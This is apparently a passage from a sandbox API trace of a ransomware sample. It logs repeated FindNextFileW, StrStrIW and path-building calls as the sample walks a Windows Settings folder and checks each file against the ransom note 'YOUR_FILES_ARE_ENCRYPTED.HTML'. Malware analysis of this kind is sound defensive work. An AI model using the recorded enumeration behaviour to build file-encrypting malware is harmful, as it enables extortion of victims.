cFileName="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", cAlternateFileName="AA9BCB~1.SET")) returned 1 [0121.641] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.641] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms") returned 197 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251fc483, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x251fc483, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", cAlternateFileName="AA7448~1.SET")) returned 1 [0121.641] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.641] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms") returned 203 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25674bba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25674bba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", cAlternateFileName="AAEECF~1.SET")) returned 1 [0121.641] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.641] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms") returned 196 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259e35e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x259e35e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x522, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", cAlternateFileName="AA28DA~1.SET")) returned 1 [0121.641] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.641] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms") returned 198 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e2ceeb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x25e2ceeb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", cAlternateFileName="AA2377~1.SET")) returned 1 [0121.642] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.642] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms") returned 206 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x260a8ee1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x260a8ee1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", cAlternateFileName="AA8C87~1.SET")) returned 1 [0121.642] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.642] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms") returned 191 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262e4835, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262e4835, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", cAlternateFileName="AA2897~1.SET")) returned 1 [0121.642] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.642] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms") returned 195 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26969b00, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26969b00, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", cAlternateFileName="AAC8EF~1.SET")) returned 1 [0121.642] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.642] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms") returned 196 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26d8eaf6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26d8eaf6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d9, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", cAlternateFileName="AAEB7A~1.SET")) returned 1 [0121.642] StrStrIW (lpFirst="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.642] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms") returned 184 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms") returned=".settingcontent-ms" [0121.642] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.642] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms") returned=".settingcontent-ms" [0121.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x533, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", cAlternateFileName="AA8460~1.SET")) returned 1 [0121.642] StrStrIW (lpFirst="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.642] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms") returned 202 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms") returned=".settingcontent-ms" [0121.643] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms") returned=".settingcontent-ms" [0121.643] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2797a518, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2797a518, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4fc, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", cAlternateFileName="AA83B4~1.SET")) returned 1 [0121.643] StrStrIW (lpFirst="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.643] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms") returned 194 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms") returned=".settingcontent-ms" [0121.643] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms") returned=".settingcontent-ms" [0121.643] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27e76442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27e76442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f2, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", cAlternateFileName="AA7819~1.SET")) returned 1 [0121.643] StrStrIW (lpFirst="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.643] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms") returned 192 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms") returned=".settingcontent-ms" [0121.643] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms") returned=".settingcontent-ms" [0121.643] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x281e3bed, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x281e3bed, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a8, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", cAlternateFileName="AA2E08~1.SET")) returned 1 [0121.643] StrStrIW (lpFirst="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.643] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms") returned 178 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms") returned=".settingcontent-ms" [0121.643] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms") returned=".settingcontent-ms" [0121.643] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283ad77e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x283ad77e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4df, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", cAlternateFileName="AAAC5D~1.SET")) returned 1 [0121.643] StrStrIW (lpFirst="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.643] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms") returned 189 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms") returned=".settingcontent-ms" [0121.643] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms") returned=".settingcontent-ms" [0121.643] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28bb96a4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28bb96a4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", cAlternateFileName="AA578E~1.SET")) returned 1 [0121.643] StrStrIW (lpFirst="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.643] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms") returned 180 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms") returned=".settingcontent-ms" [0121.643] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.643] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms") returned=".settingcontent-ms" [0121.643] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cc4a7f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28cc4a7f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", cAlternateFileName="AA2327~1.SET")) returned 1 [0121.644] StrStrIW (lpFirst="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.644] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms") returned 196 [0121.644] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms") returned=".settingcontent-ms" [0121.644] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.644] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms") returned=".settingcontent-ms" [0121.644] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28eb4661, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28eb4661, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", cAlternateFileName="AABE84~1.SET")) returned 1 [0121.644] StrStrIW (lpFirst="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.644] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms") returned 192 [0121.644] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms") returned=".settingcontent-ms" [0121.644] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.644] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms") returned=".settingcontent-ms" [0121.644] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x293271fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x293271fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", cAlternateFileName="AA1FF5~1.SET")) returned 1 [0121.644] StrStrIW (lpFirst="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.644] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms") returned 192 [0121.644] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms") returned=".settingcontent-ms" [0121.644] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.644] PathFindExtensionW (pszPath="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms") returned=".settingcontent-ms" [0121.644] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x297795d1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x297795d1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", cAlternateFileName="AAC183~1.SET")) returned 1 [0121.645] StrStrIW (lpFirst="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.645] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: 